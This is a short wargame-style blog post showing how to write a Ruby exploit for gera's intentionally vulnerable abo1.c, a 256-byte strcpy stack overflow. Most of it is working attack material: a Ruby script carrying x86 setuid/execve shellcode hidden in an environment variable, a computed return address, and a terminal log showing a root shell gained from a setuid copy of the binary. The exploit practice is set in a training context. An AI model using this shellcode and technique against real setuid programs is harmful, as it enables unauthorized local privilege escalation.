Overflowed !!



On the way playing vortex wargames,
I found this nice atical written by teleh0r@doglover.com, called
Writing Bufferoverflow Exploit with Perl.

So ...
This small little blog will be a very small how-to on writting exploit with ruby.
I'm not planning to explain further on what is bufferoverflow and how to exploit it.



If you wish to read more papers , there's some articals in
BADC0DED and
L0T3K




I took the example from gera's Insecure Programming Example

From the Advanced Bufferoverflow Section. File Name : abo1.c



Here's there code :

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

     $ gcc -o abo1 abo1.c
     $ ./abo1 `ruby -e 'print "A" *  268'`
        Segmentation fault

From the code we can see that, this peace of C code only can containie

256 Char, when we insert 268 A's it will automatically Stop.

#!/usr/local/bin/ruby

# Ruby Code by, xWinGs
# Shell Code by, OYXin
# File name : abo1-exp.rb

shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

path = "./abo1"
buffer = ("A" * 268)
ret = (0xbffffffa - shellcode.length - path.length)

print "Shellcode : " , shellcode.length , "\n"
print "Path      : ", path.length, "\n"
print "New ret   : " , ret , "\n"

new_ret = [ret].pack('L')
buffer += new_ret
ENV['BadShell'] = "#{ENV['BadShell']}#{shellcode}"

system(path,buffer)

Few More steps to go :

 root# chmod u+s abo1
     $ ruby abo1-exp.rb
     $ id
       uid=1000(xwings) gid=1000(xwings) groups=1000(xwings)
     $ ruby abo1-exp.rb
       Shellcode : 40
       Path      : 6
       New ret   : 3221225420
     # id
       uid=0(root) gid=0(root) groups=1000(xwings)